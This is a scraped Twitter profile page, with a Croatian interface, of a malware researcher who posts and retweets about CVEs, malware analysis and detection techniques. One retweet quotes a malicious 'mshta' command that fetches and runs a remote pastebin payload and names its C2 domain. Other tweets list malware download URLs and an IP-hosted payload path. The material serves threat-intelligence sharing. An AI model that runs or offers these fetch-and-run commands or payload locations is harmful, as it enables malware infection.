edx

@criznash

security, drum and bass, stuff and things. AHAtian, w00er, professional hard chatter. moderator @ - blog @

Austin, TX
reddit.com/r/malware
Vrijeme pridruživanja: ožujak 2011.
192 fotografije ili videozapisa Fotografije i videozapisi

Tweetovi

Blokirali ste korisnika/cu @criznash

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @criznash

  1. Prikvačeni tweet
    5. pro 2018.

    i promised forthcoming public research when i announced joining and my first contribution came with my first ever CVE credit for CVE-2018-15982! Massive thanks to and from my team and to for quickly patching the issue! 😁😁😁

    New research: An Adobe Flash zero-day via a docx file enables an attacker to execute code on a victims computer.
    34 proslijeđena tweeta 71 korisnik označava da mu se sviđa
    Poništi
  2. proslijedio/la je Tweet
    prije 22 sata

    "We have an obligation to read aloud to our children. To read them things they enjoy. To read to them stories we are already tired of." from for .

    5 replies 120 proslijeđenih tweetova 492 korisnika označavaju da im se sviđa
    Poništi
  3. proslijedio/la je Tweet
    prije 21 sat

    So is moving away from "Installing" & "Installed" DebugStrings to some random strings utilizing CryptGenRandom, sandbox vendors good luck!

    1 reply 21 proslijeđeni tweet 51 korisnik označava da mu se sviđa
    Poništi
  4. proslijedio/la je Tweet
    3. velj

    VB6 Packers are no joke, This one took me a while to write and I do hope you enjoy it! Analyzing Modern Malware Techniques - Part 3 Vb6 packers

    45 proslijeđenih tweetova 76 korisnika označava da im se sviđa
    Poništi
  5. proslijedio/la je Tweet
    3. velj

    ICYMI announced a kernel mode anticheat engine ( ) They mention no surveillance capabilities (prove it) & others are doing it (true) My question: How much code, developers, and involvement in this? Asking for a friend

    12 proslijeđenih tweetova 28 korisnika označava da im se sviđa
    Poništi
  6. proslijedio/la je Tweet
    29. sij

    1\ I've written a little compiler to ship ML models as standalone Yara rules, and done proof of concept detectors for Macho-O, RTF files, and powershell scripts. So far I have decision trees, random forests, and logistic regression (LR) working.

    15 replies 104 proslijeđena tweeta 253 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    1. velj

    via , analysis

    5 proslijeđenih tweetova 9 korisnika označava da im se sviđa
    Poništi
  8. proslijedio/la je Tweet
    1. velj

    Here are the slides from my . I fixed a few typos and added links and resources.

    33 proslijeđena tweeta 61 korisnik označava da mu se sviđa
    Poništi
  9. proslijedio/la je Tweet
    31. sij

    The fact that malware created over a decade ago is in the top 3 detected in 2019 should help illustrate the crumbling aqueduct off technical debt that still festers unpaid in today’s Internet.

    Coinminer, followed by Wannacry and Conficker (yes really!) dominated the top 3 detected malware of 2019 3/x
    Prikaži ovu nit
    16 replies 170 proslijeđenih tweetova 442 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    30. sij

    Quick visual on triaging a multi-stage payload starting with a persistent scheduled task launching: mshta http:\\pastebin[.]com\raw\JF0Zjp3g ⚠️ note: simple backslash URL trick 💆 know: "4D 5A" (MZ) 🔚 Result: on https://paste[.]ee/r/OaKTX C2: cugugugu.duckdns[.]org

    57 proslijeđenih tweetova 155 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  11. proslijedio/la je Tweet
    31. sij

    MSBuild without MSBuild

    10 proslijeđenih tweetova 10 korisnika označava da im se sviđa
    Poništi
  12. proslijedio/la je Tweet
    30. sij

    People who their are unsung .

    28 proslijeđenih tweetova 37 korisnika označava da im se sviđa
    Poništi
  13. proslijedio/la je Tweet
    30. sij

    TrickBot gtag MAN1 if you want the history of why me and THL talk about MAN1 -> a paper I wrote using lots data sets that had been gathered over the years!

    check this out raqmiyat[.]com/man1.exe trickbot. cool filename.
    7 proslijeđenih tweetova 10 korisnika označava da im se sviđa
    Poništi
  14. proslijedio/la je Tweet
    30. sij

    People of the Internet (esp. twitter), I am pleased to announce the launch of the at ! (just in time for !)

    1 reply 6 proslijeđenih tweetova 16 korisnika označava da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  15. proslijedio/la je Tweet
    29. sij

    We published our research "An Overhead View of the Royal Road" (English version)😉

    58 proslijeđenih tweetova 98 korisnika označava da im se sviđa
    Poništi
  16. proslijedio/la je Tweet
    28. sij

    1\ Surprisingly, you could build a very mediocre PE malware detector with a single PE feature: the PE compile timestamp. In fact, I built a little random forest detector that uses only the timestamp as its feature that gets 62% detection on previously unseen malware at a 1% FPR.

    6 replies 133 proslijeđena tweeta 333 korisnika označavaju da im se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi
  17. proslijedio/la je Tweet
    27. sij
    Odgovor korisniku/ci

    “Give me your solvent, your rested, your rugged individualists, yearning to avoid taxes.”

    47 proslijeđenih tweetova 206 korisnika označava da im se sviđa
    Poništi
  18. proslijedio/la je Tweet
    27. sij

    Here's a simple, cheap detection for some publicly available dos/RCE tools for the "BlueGate" RDP gateway vuln. Look for JA3=2e29256489ce9efe000820389e24b2fd on UDP 3391. CVE-2020-0609 & CVE-2020-0610 use DTLS, which / parse into ssl.log just fine.

    7 proslijeđenih tweetova 28 korisnika označava da im se sviđa
    Poništi
  19. proslijedio/la je Tweet
    27. sij

    I wrote a bit about hunting for UEFI Implants, and realising that we’re failing as an industry -- along with some ideas of things we could do to fix it. Comments welcome, especially from and ...

    8 replies 27 proslijeđenih tweetova 72 korisnika označavaju da im se sviđa
    Poništi
  20. 27. sij

    Adware is a joke to many organizations, to the point that they straight up ignore adware infections. The exposure is no joke, though. Some adware is highly sophisticated and feature-packed, and I’m only surprised we don’t see/hear of more cases like this.

    From an adware to a banking trojan: - PUA.InstallCapital c4b1077d4954b2536239dd7546ea6202 - Stage2 InstallCapitall: PUA.ImpulseLTD (exee. space/installer/exee.exe) - Stage2 ImpulseLTD : Dreambot (AES (new ?!) dJReCsX8qWlhQ0kv) 34.240.96. 52/files/sp/vvvv.exe
    Prikaži ovu nit
    1 proslijeđeni tweet 7 korisnika označava da im se sviđa
    Poništi
  21. proslijedio/la je Tweet
    27. sij

    GreyNoise has been observing this as well. We call these Discovery Attacks. TL;DR Someone hits every server on the internet with something unique then traces back where they sent each request to find collectors Operationalized by (I believe) the Muhstik botnet recently

    over the past week or more, my HTTP honeypot has been seeing a small but growing number of hosts querying for a very distinctive path. i figured it out - it's a sensor discovery attack, globally scoped (not unique to me or speicific sensor nets). 1/
    Prikaži ovu nit
    33 proslijeđena tweeta 81 korisnik označava da mu se sviđa
    Prikaži ovu nit
    Prikaži ovu nit
    Poništi

@criznash još nije objavio nijedan Tweet.

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·